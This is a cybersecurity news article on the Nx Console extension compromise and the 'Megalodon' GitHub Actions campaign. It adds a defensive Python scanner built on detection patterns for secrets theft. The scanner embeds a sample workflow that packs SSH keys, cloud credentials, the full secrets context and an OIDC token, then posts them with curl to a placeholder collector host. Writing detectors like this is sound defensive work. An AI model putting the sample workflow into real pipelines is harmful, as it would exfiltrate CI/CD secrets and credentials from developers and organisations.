
Developer Tools Turned Against Developers in Twin Supply Chain Campaigns

Two interconnected supply chain campaigns exploited the Nx Console VS Code extension and GitHub Actions workflows, stealing CI/CD secrets and internal source code from millions of developer machines.

CSBadmin

How the Attacks Worked

A pair of coordinated supply chain attacks has put millions of software developers on alert. Threat actors abused trusted developer tooling, the Nx Console VS Code extension and GitHub Actions workflows, to steal credentials, cloud tokens, and source code. In the first campaign, a poisoned build of the Nx Console extension, version 18.95.0, was published to the Visual Studio Code Marketplace. With more than 2.2 million installations, the extension gave the attackers an enormous blast radius. Among the compromised machines was a GitHub employee's device, which led to the unauthorized exfiltration of roughly 3,800 internal GitHub source code repositories.

The Megalodon Campaign

A parallel campaign, dubbed "Megalodon," ran at the same time. Within a six-hour window on May 18, 2026, an automated attacker pushed 5,718 malicious commits to 5,561 public GitHub repositories. The injected GitHub Actions workflows harvested CI/CD secrets, cloud credentials, SSH keys, and OIDC tokens and sent everything to a command-and-control server. The chain began when the attackers stole a contributor's GitHub personal access token in an earlier supply chain incident and used that token to plant a hidden orphan commit, carrying an obfuscated JavaScript payload, in the official nrwl/nx GitHub repository. Analysts at CISA assessed the full scope of the threat and published an urgent alert advising organizations to treat any machine that ran the compromised extension as fully compromised.
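The workflow-injection technique described above leaves a recognisable shape in a repository: a step that reads credential material (the whole `secrets` context, the runner's OIDC token endpoint, SSH or cloud credential files) and then posts it to a host the project never talked to before. The scanner below is an added example written for this page, not code from the article, from nrwl/nx, or from CISA, and its indicators are generic patterns rather than published indicators of compromise. The allowlist of hosts, the severity weights, and the two workflow samples (one harvester, one ordinary CI job, both constructed here, with a `.invalid` hostname for the collector) are assumptions for the demonstration.

```python
"""Triage scanner for GitHub Actions workflows that look like credential harvesters.

Added example, not from the article, nrwl/nx or CISA. Indicators are generic
patterns assumed for the demo, not published IOCs.
"""
import re
from pathlib import Path

# Hosts a CI job commonly contacts; anything else counts as an unknown destination. (assumed)
ALLOWED_HOSTS = {"github.com", "api.github.com", "objects.githubusercontent.com",
                 "registry.npmjs.org", "pypi.org"}

# (description, severity, pattern). Severities are a rough triage weight, not a standard.
RULES = [
    ("dumps the entire secrets context", 3, re.compile(r"toJSON\s*\(\s*secrets\s*\)")),
    ("requests the job's OIDC token", 3, re.compile(r"ACTIONS_ID_TOKEN_REQUEST_(URL|TOKEN)")),
    ("touches SSH key material", 2, re.compile(r"~/\.ssh|\$HOME/\.ssh|id_(rsa|ed25519|ecdsa)")),
    ("touches cloud credential files", 2, re.compile(r"~/\.aws|\$HOME/\.aws|\.config/gcloud|~/\.azure")),
    ("grants id-token: write", 1, re.compile(r"id-token:\s*write")),
    ("base64-encodes data in a shell step", 1, re.compile(r"\bbase64\b")),
]

URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")


def unexpected_hosts(text: str) -> list[str]:
    """Hosts named by URL in the workflow that are not on the allowlist."""
    return sorted({h for h in URL_HOST_RE.findall(text) if h not in ALLOWED_HOSTS})


def scan_workflow(text: str) -> list[tuple[str, int]]:
    """Return (description, severity) for every indicator found in one workflow."""
    findings = [(desc, sev) for desc, sev, rx in RULES if rx.search(text)]
    hosts = unexpected_hosts(text)
    # Credential access plus an outbound destination we don't recognise is the
    # exfiltration shape the article attributes to the injected workflows.
    if hosts and any(sev >= 2 for _, sev in findings):
        findings.append(("sends data to non-allowlisted host(s): " + ", ".join(hosts), 3))
    return findings


def risk_score(text: str) -> int:
    """Sum of severities; use it to rank files for manual review."""
    return sum(sev for _, sev in scan_workflow(text))


def is_exfil_candidate(text: str) -> bool:
    """True when credential access and an unknown outbound host occur together."""
    return bool(unexpected_hosts(text)) and any(sev >= 2 for _, sev in scan_workflow(text))


def scan_repo(root: str) -> dict[str, list[tuple[str, int]]]:
    """Scan every workflow under <root>/.github/workflows; returns only files with findings."""
    results = {}
    for path in Path(root, ".github", "workflows").glob("*.y*ml"):
        findings = scan_workflow(path.read_text(encoding="utf-8", errors="replace"))
        if findings:
            results[str(path)] = findings
    return results


# Constructed samples for the demo (not real workflows from any compromised repository).
MALICIOUS_WORKFLOW = r"""
name: ci
on: [push, pull_request]
permissions:
  id-token: write
  contents: read
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: build
        env:
          ALL_SECRETS: ${{ toJSON(secrets) }}
        run: |
          OIDC=$(curl -s -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL")
          tar cz ~/.ssh ~/.aws 2>/dev/null | base64 -w0 > /tmp/blob
          echo "$ALL_SECRETS" | base64 -w0 >> /tmp/blob
          curl -s -X POST -H "X-Token: $OIDC" --data-binary @/tmp/blob https://collector.example.invalid/up
"""

BENIGN_WORKFLOW = r"""
name: ci
on: [push]
permissions:
  contents: read
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: npm ci && npm test
      - run: curl -sSf https://api.github.com/repos/${{ github.repository }}/releases/latest
"""

if __name__ == "__main__":
    for label, wf in (("malicious", MALICIOUS_WORKFLOW), ("benign", BENIGN_WORKFLOW)):
        print(f"{label}: score={risk_score(wf)} exfil_candidate={is_exfil_candidate(wf)}")
        for desc, sev in scan_workflow(wf):
            print(f"  [{sev}] {desc}")
```

Run `scan_repo(".")` from a checkout to rank workflow files for review, and pair it with `git log --diff-filter=AM -- .github/workflows` over the window of interest so that newly added or modified workflows are examined first. The `base64` and `id-token: write` rules fire on plenty of legitimate jobs on their own, which is why the exfiltration verdict requires both a credential-access indicator and an unknown destination; extend `ALLOWED_HOSTS` with the endpoints your pipelines genuinely use rather than lowering the threshold.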

Source: Cyber Security News

CSBadmin

The latest in cybersecurity news and updates.